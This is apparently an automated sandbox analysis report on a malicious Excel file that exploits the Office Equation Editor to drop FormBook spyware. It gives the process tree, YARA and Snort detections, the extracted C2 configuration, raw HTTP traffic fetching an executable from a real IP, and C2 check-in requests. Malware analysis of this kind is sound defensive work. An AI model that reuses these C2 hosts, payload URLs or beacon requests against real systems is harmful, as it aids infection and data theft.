Loading ...

Play interactive tourEdit tour

Analysis Report Processed APR12.xlsx

Overview

General Information

Sample Name:Processed APR12.xlsx
Analysis ID:385456
MD5:c41fd90fc1e23885a1e075ce11d612e8
SHA1:d1903963f15c001baceb7c0e92998bc38a19f318
SHA256:9328d5dcf7664d4a92915ba032a183e63ef8602445737f42bf4d479b8037e1c2
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2312 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2540 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2684 cmdline: 'C:\Users\Public\vbc.exe' MD5: 396071CF13F858E6677A6655A2D173BB)
      • vbc.exe (PID: 2848 cmdline: C:\Users\Public\vbc.exe MD5: 396071CF13F858E6677A6655A2D173BB)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • help.exe (PID: 2216 cmdline: C:\Windows\SysWOW64\help.exe MD5: 0F488C73AA50C2FC1361F19E8FC19926)
            • cmd.exe (PID: 620 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2540, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exeReversingLabs: Detection: 41%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 41%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Processed APR12.xlsxReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
          Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2229449674.0000000000699000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.centergolosinas.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 3.125.17.227:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 3.125.17.227:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 12:45:15 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Sun, 11 Apr 2021 17:55:36 GMTETag: "ccc00-5bfb61ab42963"Accept-Ranges: bytesContent-Length: 838656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 33 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c0 0c 00 00 0a 00 00 00 00 00 00 8e de 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 de 0c 00 57 00 00 00 00 e0 0c 00 50 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 be 0c 00 00 20 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 50 06 00 00 00 e0 0c 00 00 08 00 00 00 c2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 ca 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 de 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 30 eb 09 00 04 f3 02 00 03 00 00 00 39 00 00 06 88 e0 02 00 a8 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 1b 41 9f 31 e7 6f 65 3c bb 46 1b 41 0f 49 b5 18 12 b8 72 9c a0 37 51 c8 e2 0c 6a af 4a c5 42 5f 7d b2 21 e8 e0 b7 1f 27 21 bf 50 12 e1 aa 5b 38 f1 bb 20 a9 83 e0 53 b7 5d 97 d8 c1 ef 04 c6 e2 95 84 5a 7d 51 f8 c4 36 e1 9b bf 12 6f 85 4a bb e4 9e 11 e3 ca 3e 23 03 a9 9e 06 37 84 bf 35 4d 22 ca 57 c5 aa fb 0e 06 c3 05 e7 ba 9e 39 5e 62 43 f5 0f 09 cf fb 22 01 d1 63 0a 1e 40 6c 40 3d a5 d3 35 57 2c f0 9f 1c 47 8c aa 66 f8 bb 67 6d 89 a3 4c 5a a2 78 aa 72 8b 84 c4 2f 3d 86 de 51 81 11 a3 9f ab f7 59 24 2d c9 0a 94 65 5f 16 76 61 09 37 60 d4 78 05 09 aa 44 ab f4 aa fa 0b 9b 0f 46 30 b0 06 e1 81 11 0f 2a 4a b6 5e d6 f2 ee 25 bf 2b 52 03 db 92 85 49 b4 d8 69 08 fa 6f b5 69 f3 6a 8b f7 3a 5e d2 ff ee 37 bc 54 23 85 c6 d5 00 1b b6 5a b6 de 81 49 c5 2f ec 3b c6 3c e7 c2 c7 db 35 e5 95 67 15 d0 5c 62 e7 29 5a a4 42 77 09 88 c0 6a d2 5c 2a cc fe 38 7b 70 a9 5b 28 e4 2f a1 c8 bb 2e 08
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=r2GsjHfDgbadIobDkfqM84hqAY3LnZYXU2evLvxsfUtrrcQFCKudTBmZizgvXIWWwk1k1Q==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.centergolosinas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=RfOK6jKkDjXJwasAc5LTyAppaXreGCTFIzs53vHZyU46XfbA28pKG07a1ZehGkxvOhkisQ==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.vectoroutlines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=H0m9fF/8FL7QqYEOA4653EpAABAppk+gPA36EdDaEoCMlE2zCVYj51CG+i/1QazvQuiVHw==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.dreamcashbuyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=Ei6RqbmoUXtm0NxuUyb/BZtLNDk4B448l51n8Zz8P/g/u3IBdZc5bEJpDCmkA548du9Vog==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.shopihy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewIP Address: 23.82.57.32 23.82.57.32
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
          Source: global trafficHTTP traffic detected: GET /winme/xles.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.125.17.227Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: unknownTCP traffic detected without corresponding DNS query: 3.125.17.227
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C627CB57.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /winme/xles.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.125.17.227Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=r2GsjHfDgbadIobDkfqM84hqAY3LnZYXU2evLvxsfUtrrcQFCKudTBmZizgvXIWWwk1k1Q==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.centergolosinas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=RfOK6jKkDjXJwasAc5LTyAppaXreGCTFIzs53vHZyU46XfbA28pKG07a1ZehGkxvOhkisQ==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.vectoroutlines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=H0m9fF/8FL7QqYEOA4653EpAABAppk+gPA36EdDaEoCMlE2zCVYj51CG+i/1QazvQuiVHw==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.dreamcashbuyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
